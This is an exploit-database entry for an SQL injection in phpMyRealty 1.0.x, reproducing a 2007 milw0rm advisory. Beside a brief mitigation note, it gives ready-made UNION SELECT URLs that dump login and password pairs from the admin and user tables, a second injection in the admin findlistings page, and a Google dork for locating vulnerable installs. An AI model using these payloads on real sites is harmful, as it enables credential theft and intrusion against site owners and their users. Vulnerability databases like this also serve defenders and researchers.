header-logo
Suggest Exploit
vendor:
phpMyRealty
by:
Koller
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: phpMyRealty
Affected Version From: 1.0
Affected Version To: 1.0.x
Patch Exists: NO
Related CWE:
CPE: a:phpmyrealty:phpmyrealty:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpMyRealty 1.0.x

The phpMyRealty 1.0.x script is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'type' parameter in the search.php file and the 'listing_updated_days' parameter in the findlistings.php file. This allows the attacker to retrieve sensitive information such as login credentials from the pmr_admins and pmr_users tables.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before using it in SQL queries. Additionally, implementing prepared statements or parameterized queries can help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# xaker.name & grabberz.com
#
#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : phpMyRealty 1.0.x
# GoogLe Dork      : Powered by phpMyRealty
# Script demo      : www.phpmyrealty.com/demo/index.php
# The price        : $99.95
# Risk             : Average
# Found By         : Koller
# Thanks           : | robo9 | rijy | Concord | Helkern | Constantine | -St1ff- | .dot | @$_terr_X | b3 |
# Vulnerable files : search.php, findlistings.php

# Vuln : www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins
#        www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_users
#
# Admin panel: www.victim.com/admin/index.php
#
# Addon :) - sql-injection in findlistings.php
# www.victim.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* 

# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-18]

Navigation

Suggest Exploit

Services By CQR